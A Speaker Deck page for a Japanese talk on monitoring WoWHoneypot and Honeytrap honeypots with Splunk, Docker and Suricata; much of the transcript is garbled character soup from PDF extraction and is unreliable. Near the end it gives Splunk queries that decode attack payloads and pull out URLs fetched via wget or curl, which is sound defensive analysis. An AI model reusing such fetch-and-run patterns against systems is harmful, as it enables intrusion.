Upgrade to Pro
— share decks privately, control downloads, hide ads and more …
Speaker Deck
Features
Speaker Deck
PRO
Sign in
Sign up for free
Search
Search
Splunkによるハニーポット監視.pdf
Search
sec-chick
September 30, 2018
0
1.4k
Splunkによるハニーポット監視.pdf
sec-chick
September 30, 2018
Tweet
Share
More Decks by sec-chick
See All by sec-chick
不審なURLの見つけ方
secchick
1
450
honeypot
secchick
1
750
SOCって何_公開用_-圧縮済み.pdf
secchick
6
1.9k
WelComeToHoneyPOTWORLD/ 低対話型ハニーポットを調査してみた
secchick
1
1.7k
Featured
See All Featured
Adopting Sorbet at Scale
ufuk
68
8.6k
How to Ace a Technical Interview
jacobian
272
22k
Designing the Hi-DPI Web
ddemaree
276
33k
The Brand Is Dead. Long Live the Brand.
mthomps
49
28k
A designer walks into a library…
pauljervisheath
200
23k
Embracing the Ebb and Flow
colly
80
4.1k
実際に使うSQLの書き方 徹底解説 / pgcon21j-tutorial
soudai
120
39k
How to Create Impact in a Changing Tech Landscape [PerfNow 2023]
tammyeverts
14
1.5k
Building Adaptive Systems
keathley
31
1.9k
Stop Working from a Prison Cell
hatefulcrawdad
266
19k
I Don’t Have Time: Getting Over the Fear to Launch Your Podcast
jcasabona
21
1.6k
Teambox: Starting and Learning
jrom
128
8.4k
Transcript
5 SPLUNK SEC-CHICK
WHO AM I • sec-chick@one_sec_chick (('/+#!/) • )/
,-$ PSOC&-% • 2 ('/+#% (WoW Honeypot, Honeytrap) 0".*/1
Splunk ( ) WoWHoneypot Honeytrap PC VPS
SSH • Splunk
SPLUNK • Splunk<(159$= 16%;'49&;/ .+-8;$ ,;*!9,+$()0-"# • IT!905!29-6 7*!3 :
> http://www.intellilink.co.jp/pd/products/package/security/splunk.html
• WoWHoneypot
• Honeytrap
8 9 1. SSH)71!&+*57%45' ,#6570 2. Splunk)71,#65705'
3. Splunk5' )7- 4. 37/ 5. 2"570 .(70 82"570HEX$6(709
Attack_connection.local_port 10
Attack_connection.payload.data_hex Hex →
1. Docker 2. 3.
Splunk 4. Suricata
/.10,-%DOCKER • /.10,-&$ $!"' * ( #) + $*
(Docker+ • $ Docker+→% $
%"-+( • .# Docker %"-+( • %"-+(cron$,* Splunk
WoWHoneypot Honeytrap !/&0)'( VPS Honeypot.# Docker
Splunk WoWHoneypot Honeytrap VPS Honeypot Docker
SPLUNK+;N? • 0 '!0.*Splunk+;N? 1 • @:NB+2EJ9N<IM' DECRYPT
1 • G4MA,+/ - "$F4LNB1@:NB"$ 'D3NKB("& → Grep '!0 *)0 - C=/87J1D3NKB("& → 0 C='#-! 1 - HK562+>5MLNB1%$URL1D3NKB("& → HK562+>5MLNB1VirusTotal'
WOWHONEYPOT |rex field=_raw "¥"(?<Method_wow>[^¥s]+)¥s(?<wow_path>[^¥s]+)¥s([^¥s]+)¥s([^¥s]+)¥s([^¥s]+)¥s(? <base64_wow>.*$)" | decrypt field="base64_wow" atob emit('base64_wow_decrypted’)
|eval decode=urldecode(base64_wow_decrypted) | rex field="decode" "wget.+(?<wget_wowhoneypot>https?://[¥w/:¥.¥-]+?)¥s"| rex field="decode" "curl.+(?<curl_wowhoneypot>https?://[¥w/:¥.¥-]+?)¥s"
HONEYTRAP | decrypt field="attack_connection.payload.data_hex" unhex emit('attack_connection.payload.data_decrypted') | rex field="attack_connection.payload.data_decrypted" "wget.+(?<wget_honeytrap>https?://[¥w/:¥.¥-]+?)¥s"
| rex field="attack_connection.payload.data_decrypted" "curl.+(?<curl_honeytrap>https?://[¥w/:¥.¥-]+?)¥s" |
HONEYTRAP
SURICATA4 • Grep05%72# 9),#1 # • ;=:><05"68+* 525
/#2# → ./ • Suricata3)#),7 !1$/'-(#??
"!-,1.)(1 • @Sec_S_Owl # • @cactus_pots # • @SugitaMuchi
# • @soji256 • @morihi_soc # -,1.)+ !Twitter-)'0(% #-,1.)+ Slack!&/0,*$ ! 2 http://goo.gl/8bLkZA
#
/)0 • Splunk(,A@CB>?, +&' • (5)"6-*5. $2%4+;C= 7$ +
7!54+%5") • #81A@CB>?7$'7<:9$'/$3DD